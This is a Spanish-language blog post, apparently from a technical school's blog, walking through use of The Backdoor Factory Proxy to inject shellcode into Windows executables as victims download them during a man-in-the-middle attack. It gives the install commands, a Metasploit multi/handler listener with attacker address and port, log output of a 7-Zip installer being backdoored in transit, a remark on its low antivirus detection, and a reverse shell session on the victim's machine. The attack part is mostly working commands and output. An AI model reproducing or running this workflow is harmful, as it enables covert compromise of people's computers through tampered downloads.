Blog gratis
Reportar
Editar
¡Crea tu blog!
Compartir
¡Sorpréndeme!
Blog de la Escuela de Educación Secundaria Técnica N 8 de Quilmes
Administrador Prof. Claudio Enrique Alonso Alvite
img
03 de Junio, 2014    General

Inyecta shellcodes en ficheros exe "al vuelo" con The Backdoor Factory Proxy (BDFProxy)


The Backdoor Factory (BDF) es una herramienta escrita en Python para "parchear" binarios ejecutables añadiendo shellcodes mediante Code Cave Injection. Esto es, en lugar de abusar de una función del API de Windows para forzar que un proceso cargue un archivo DLL, asignar memoria en nuestro proceso de destino e inyectar un pequeño fragmento de código, o mejor dicho el trozo que cargará el archivo DLL. Esta es una forma más eficaz y menos detectada de inyección de código.

Más o menos, lo que hace BDF es enumerar el formato de la cabecera PE/COFF, buscar code caves que correspondan al tamaño del shellcode, insertarlo y volver a los registros/flags correspondientes para continuar con la ejecución normal del programa. Además permite "backdoorizar" un directorio entero, personalizar tus propios shellcodes y tiene un módulo de inyección bastante chulo que mirará un proceso o servicio específico para automatizar la inyección.

Y por si fuera poco, recientemente se ha publicado The Backdoor Factory Proxy (BDFProxy) que es capaz de parchear los binarios "al vuelo" durante la descarga, convirtiendo un MITM en un vector de ataque sumamente peligroso:

Su instalación en Kali Linux es sumamente sencilla:
root@kali:~# git clone https://github.com/secretsquirrel/BDFProxy bdf-proxy/
root@kali:~/bdf-proxy# ./install.sh 
root@kali:~/bdf-proxy# ./update.sh 

Necesitaremos también el módulo 'pefile' para leer y trabajar con ficheros PE (Portable Executable):
root@kali:~/bdf-proxy# wget https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz
root@kali:~/bdf-proxy# tar -zxvf pefile-1.2.10-139.tar.gz 
root@kali:~/bdf-proxy/pefile-1.2.10-139# python setup.py install

Echamos un vistazo al fichero de configuración bdfproxy.cfg y lanzamos el script principal:
root@kali:~/bdf-proxy# ./bdf_proxy.py 
[!] Writing resource script.
[!] Resource writen to bdfproxy_msf_resource.rc
[!] Starting BDFProxy

Luego preparamos nuestro meterpreter:
msf > use multi/handler
msf  exploit(handler) > set LHOST 192.168.142.128
LHOST => 192.168.142.128
msf  exploit(handler) > set LPORT 8443
LPORT => 8443
msf  exploit(handler) > exploit -z -j

Y cuando la víctima se descargue un ejecutable de Internet se parcheará automáticamente con nuestro shellcode:


********** REQUEST **********
[*] HOST:  cznic.dl.sourceforge.net
[*] PATH:  /project/sevenzip/7-Zip/9.20/7z920.exe
********** END REQUEST **********
========== RESPONSE ==========
[*] HOST:  cznic.dl.sourceforge.net
[*] PATH:  /project/sevenzip/7-Zip/9.20/7z920.exe
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
[*] /tmp/tmpS8kUPf backdooring complete
[*] Patching complete, forwarding to user.
========== END RESPONSE ==========

El fichero exe resultante no es FUD pero tiene una tasa de detección bastante baja:
https://www.virustotal.com/es/file/176bcf478114f69c82a2fb99b9950dbe6a2d4ca5edce099c28e591bdf1c700e3/analysis/1401706535/
      
Así que cuando la víctima ejecute el fichero exe infectado abrirá en background una sesión remota en nuestro equipo (el del atacante):      
msf exploit(handler) > [*] Command shell session 1 opened (192.168.142.128:8443 -> 172.20.3.109:11162) at 2014-06-02 01:19:36 -0400
msf exploit(handler) > 
msf exploit(handler) > sessions -l
Active sessions
===============
  Id  Type           Information     Connection
  --  ----           -----------     ---------
  1   shell windows                  192.168.142.128:8443 -> 172.20.3.109:11162 (172.20.3.109)
  msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows [Versi�n 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:UsersmotosDesktop>whoami
whoami
PC23462motos
Palabras claves , , , , , , , ,
publicado por alonsoclaudio a las 19:57 · Sin comentarios  ·  Recomendar
 
Más sobre este tema ·  Participar
Comentarios (0) ·  Enviar comentario
Enviar comentario

Nombre:

E-Mail (no será publicado):

Sitio Web (opcional):

Recordar mis datos.
Escriba el código que visualiza en la imagen Escriba el código [Regenerar]:
Formato de texto permitido: <b>Negrita</b>, <i>Cursiva</i>, <u>Subrayado</u>,
<li>· Lista</li>
CALENDARIO
Ver mes anterior Julio 2019 Ver mes siguiente
DOLUMAMIJUVISA
123456
78910111213
14151617181920
21222324252627
28293031
BUSCADOR
Blog   Web
TÓPICOS
» General (2606)
NUBE DE TAGS  [?]
SECCIONES
» Inicio
ENLACES
MÁS LEÍDOS
» Analizando el LiveBox 2.1 de Orange
» Cómo espiar WhatsApp
» Cómo usar Metashield protector for Client y por qué utilizarlo
» Ejecución remota de código arbitrario en OpenSSH
» Ganar dinero con 1.200 Millones de identidades robadas
» Hardware y sus 4 Funcionamientos Basicos y Principales en una Computadora
» Redes de la Deep Web: CJDNS y la Red Hyperboria
» Unidad Central de Procesamiento CPU
» Vulnerabilidad en Youtube permitió borrar cualquier video
» Wassap, la aplicación que permite usar WhatsApp desde la PC
SE COMENTA...
» Cómo espiar WhatsApp
423 Comentarios: FERNANDO JAVIER, FERNANDO JAVIER, Fábio, [...] ...
» Bugs de Open Redirect en 22 dominios de Google
2 Comentarios: Alex, Alex
» Keylogging: técnicas y software para robar contraseñas
2 Comentarios: Alex, Alex
» Wassap, la aplicación que permite usar WhatsApp desde la PC
4 Comentarios: jumanji, alex ...
» Unidad Central de Procesamiento CPU
2 Comentarios: Alex ...
SOBRE MÍ
FOTO

Prof. Claudio Enrique Alonso Alvite



» Ver perfil

AL MARGEN
Escuela de Educacion Secundaria Tecnica N 8 de Quilmes
(Técnicos en Informática Personal y Profesional)
FULLServices Network | Blogger | Privacidad